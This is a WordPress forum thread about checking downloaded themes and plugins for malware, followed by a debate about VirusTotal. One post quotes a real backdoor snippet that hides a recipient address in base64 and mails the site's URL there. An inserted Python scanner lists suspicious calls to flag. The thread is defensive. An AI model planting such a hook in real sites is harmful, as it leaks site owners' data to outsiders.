04-28-2014, 07:39 AM
(This post was last modified: 05-20-2014 12:33 PM by incredibleINDIA.)
Post: #1
[ MUST READ ] SOMETHING THAT EVERYONE MUST DO BEFORE USING DOWNLOADED CODES AND THEME
DON'T LEAVE ANY WORD, IF YOU WANT YOUR BUSINESS/WORK TO KEEP RUNNING LIKE BUTTER
There are so many methods to be on the secure side. I am going to post each and every method I use before using any code/script/theme:
1. VIRUSTOTAL METHOD + OTHER IMPORTANT STEPS TO FOLLOW (Time taken to make a post: 45 min) POST #2
2. CODE CHECKING + OTHER INFECTED CODE DETECTION METHOD (Time taken to make a post: 30 min) POST #7
3. SOON GOING TO POST ......
OTHER MEMBERS ARE MORE THAN WELCOME HOW YOU CAN HELP ME AND OTHERS
04-28-2014, 07:43 AM
(This post was last modified: 04-30-2014 09:50 AM by incredibleINDIA.)
Post: #2
VIRUS TOTAL METHOD + OTHER IMPORTANT STEPS TO FOLLOW
--------------------------------------------------------------------------------
STEP #1 =>
STEP #2 =>
STEP #3 =>
04-28-2014, 08:42 AM
Post: #3
RE:
@patelnirpendra, Thank you
Nice idea. If I may, I will also suggest testing on localhost, such as XAMPP, and using these WordPress plugins:
-Debug Bar Remote Requests
-Query Monitor
-Core Control or WP Crontrol
One last thing is to use WP Mail SMTP with Email Log (both are WordPress plugins). You can also put phpMalCodeScanner.php (google it) in your WordPress blog folder. Hope this was helpful.
04-28-2014, 08:58 AM
Post: #4
RE:
(04-28-2014 08:42 AM)semerkhet22 Wrote: @patelnirpendra, Thank you
Thanks for it, I would add it all soon. Some ideas are even new for me too. I use Query Monitor and the TAC WordPress plugin. +5 reps added for you, now you are no more virgin
04-30-2014, 07:21 AM
Post: #5
RE:
Hi,
I think that everyone shall be involved in this thread by patelnirpendra as we all have to gain from it. It will also be very helpful to all of us to share all malicious code that has been discovered, in encoded and decoded format.
PHP Code:
add_action('wp_head', 'my_wpfunww7c8bb');
function my_wpfunww7c8bb() {
    if (!username_exists('wordpress')) {
        // Base64 hides the recipient address from a plain-text search.
        $addressdecode = base64_decode("d29yZHByZXNzc2xvZ0B5YW5kZXguY29t");
        $vari = 'Wordpress Plugin';
        // Mails the site URL to the decoded address.
        wp_mail($addressdecode, $vari, get_bloginfo('wpurl'));
    }
}
This will keep sending email to wordpressslog@yandex.com; as this email does not exist, your email server will keep resending. Also search for every "wp_create_user" and delete the function.
Another threat is the sneaky social.png: it is not really an image, as you can view the malicious code if you open it in a text editor. It will insert a custom option in the wp-options table to redirect to a YouTube video.
Hope this will help.
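A static triage pass over an unpacked theme, added here as an example and not part of the original posts: it decodes base64_decode() string literals, flags the calls named in this thread, and catches PHP hidden in image files such as the social.png case. The names scan_text and scan_tree and the indicator list are assumptions for illustration; a hit means "read this file by hand", since these calls also appear in legitimate code.

```python
import base64
import re
from pathlib import Path

# Calls named in this thread. Post #9's caveat applies: they also occur in
# legitimate code, so a hit means "read this file", not "infected".
INDICATORS = ("wp_create_user", "username_exists", "wp_mail", "eval")
B64_CALL = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".ico"}

# The snippet quoted in post #5, used as sample input.
SAMPLE = '''add_action('wp_head','my_wpfunww7c8bb');
function my_wpfunww7c8bb(){if(!username_exists('wordpress')){
$addressdecode=base64_decode("d29yZHByZXNzc2xvZ0B5YW5kZXguY29t");
$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}'''

def scan_text(text):
    """Return (kind, detail) findings for one PHP source string."""
    findings = []
    for m in B64_CALL.finditer(text):
        try:  # show what the literal hides, e.g. an e-mail address or URL
            decoded = base64.b64decode(m.group(1), validate=True)
            findings.append(("base64_literal", decoded.decode("utf-8", "replace")))
        except ValueError:
            findings.append(("base64_literal", "<undecodable>"))
    for name in INDICATORS:
        if re.search(r"\b" + name + r"\s*\(", text):
            findings.append(("call", name))
    return findings

def scan_tree(root):
    """Walk an unpacked theme/plugin; return {relative path: findings}."""
    report = {}
    for path in sorted(p for p in Path(root).rglob("*") if p.is_file()):
        data, ext = path.read_bytes(), path.suffix.lower()
        found = []
        if ext == ".php":
            found = scan_text(data.decode("utf-8", "replace"))
        elif ext in IMAGE_EXTS and b"<?php" in data:
            # The "social.png" case: an image that is really PHP source.
            found = [("php_in_image", "PHP open tag inside an image file")]
        if found:
            report[path.relative_to(root).as_posix()] = found
    return report

if __name__ == "__main__":
    for finding in scan_text(SAMPLE):
        print(finding)
```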
04-30-2014, 09:30 AM
Post: #6
RE:
(04-30-2014 07:21 AM)semerkhet22 Wrote: Hi,
YOU FOUND IT INJECTED SOMEWHERE OR YOU MADE IT?
04-30-2014, 09:48 AM
(This post was last modified: 04-30-2014 09:53 AM by incredibleINDIA.)
Post: #7
RE:
CODE CHECKING + OTHER INFECTED CODE DETECTION METHOD
-------------------------------------------------------------
INTRODUCTION TO BACKDOOR :
HOW TO BE ON SAFE SIDE :
FILES MOST TARGETED BY HACKERS IN WORD PRESS THEMES :
04-30-2014, 01:36 PM
(This post was last modified: 04-30-2014 01:36 PM by semerkhet22.)
Post: #8
RE:
@patelnirpendra, sorry if you did not understand me.
I was pointing to the fact that we must share all known malware that we encountered while testing downloaded themes and plugins so members could identify real threats. Sorry again for the misunderstanding.
04-30-2014, 01:43 PM
Post: #9
RE:
Using exploit scanner plugin, there's a lot of base64 and eval code in native Wordpress and plugins that MANY people use.
04-30-2014, 02:12 PM
Post: #10
RE:
You are very wrong about using virustotal.com. I commend you for trying to help people stay safe but I have to say that anyone pushing virustotal.com as a method of detecting threats, or relying on it to determine if a file is safe, is simply giving bad advice and repeating the bad information they were fed at one time.
That site is nothing more than a warm fuzzy for people who don't know better. It does nothing to detect 0day threats or polymorphic threats. They use featureless CLI utilities that don't include the tools necessary to be a viable A/V. We all know that A/V products in general are an overhyped method of security. Nothing beats due diligence and actually looking at the code yourself.
I would say to anyone reading the OP section on virustotal.com to disregard it as an opinion not based upon fact. I would encourage everyone to read their FAQ, more specifically the section on statistics. It's the part where they say not to use their own product in the manner in which this thread is pushing it. Here, take a look.
Those who use VirusTotal to perform antivirus comparative analyses should know that they are making many implicit errors in their methodology, the most obvious being:
-VirusTotal's antivirus engines are commandline versions, so depending on the product, they will not behave exactly the same as the desktop versions: for instance, desktop solutions may use techniques based on behavioural analysis and count with personal firewalls that may decrease entry points and mitigate propagation, etc.
-In VirusTotal desktop-oriented solutions coexist with perimeter-oriented solutions; heuristics in this latter group may be more aggressive and paranoid, since the impact of false positives is less visible in the perimeter. It is simply not fair to compare both groups.
-Some of the solutions included in VirusTotal are parametrized (in coherence with the developer company's desire) with a different heuristic/aggressiveness level than the official end-user default configuration.
These are just three examples illustrating why using VirusTotal for antivirus testing is a bad idea, you can read more about VirusTotal and antivirus comparatives in our blog.
https://www.virustotal.com/en/faq/#statistics